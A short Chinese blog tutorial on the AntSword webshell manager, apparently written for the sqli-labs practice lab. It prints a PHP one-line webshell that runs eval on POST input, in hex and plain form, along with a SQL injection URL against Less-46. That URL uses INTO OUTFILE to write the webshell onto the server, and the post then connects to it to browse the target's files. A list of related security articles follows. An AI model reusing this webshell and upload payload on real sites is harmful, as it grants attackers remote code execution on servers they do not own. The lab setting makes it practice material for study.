中国蚁剑使用方法

情分丶2025-07-10 9:24

找到mysql配置文件

python 复制代码 
secure-file-priv=

工作目录

python 复制代码 
D:\tool\huli\gui_webshell\AntSword\AntSword\antSword-master

重点是tool目录后面 前面大家可能都不一样

添加数据

一句话木马

python 复制代码 
3C3F706870206576616C28245F504F53545B22636D64225D293B3F3E
翻译过来
<?php eval($_POST["cmd"]);?>

示例天书第46关上传木马

python 复制代码 
/?sort=1%20into%20outfile%20"D:\\phpstudy_pro\\WWW\\sql\\sqli-labs-master\\Less-46\\test1.php"%20lines%20terminated%20by%200x3c3f706870206576616c28245f504f53545b22636d64225d293b3f3e

选择你上传一句话木马的url地址 具体到 你上传的文件名

这个参数就是连接密码

完成操作后 可以操作对方的目录

相关推荐
一名优秀的码农4 天前
vulhub系列-14-Os-hackNos-1(超详细)
安全·web安全·网络安全·网络攻击模型·安全威胁分析
努力的lpp4 天前
SQLMap CTF 常用命令全集
数据库·web安全·网络安全·sql注入
努力的lpp4 天前
SQL 报错注入
数据库·sql·web安全·网络安全·sql注入
岛屿旅人4 天前
2025年中东地区网络安全态势综述
网络·安全·web安全·网络安全
努力的lpp4 天前
【ctf常用备用文件名字典】
web安全·网络安全·ctf
Mikowoo0074 天前
渗透测试_漏洞利用
网络安全
啥都想学点4 天前
pikachu靶场——Cross-Site Scripting-1(Kali系统)
网络安全
F1FJJ4 天前
基于网络隐身的内网穿透
网络协议·网络安全·go
苏天夏4 天前
Passport 插件:Typecho 密码安全的技术守护者
安全·网络安全·php
Lust Dusk4 天前
CTFHUB靶场 HTTP协议——302跳转
web安全·网络安全
热门推荐
01GitHub 镜像站点02【OpenClaw 本地实战 Ep.3】突破瓶颈:强制修改 openclaw.json 解锁 32k 上下文记忆03OpenClaw 使用和管理 MCP 完全指南04OpenClaw + 飞书(Feishu)环境搭建指南05Claude Code + GLM4.7 避坑指南:解决 Unable to connect to Anthropic services06OpenClaw优化飞书API 额度已耗尽问题07Clawdbot部署教程:解决‘gateway token missing’授权问题的完整步骤08Window 10部署openclaw报错node.exe : npm error code 12809OpenClaw大龙虾机器人完整安装教程10OpenClaw 接入阿里云百炼 Coding Plan 指南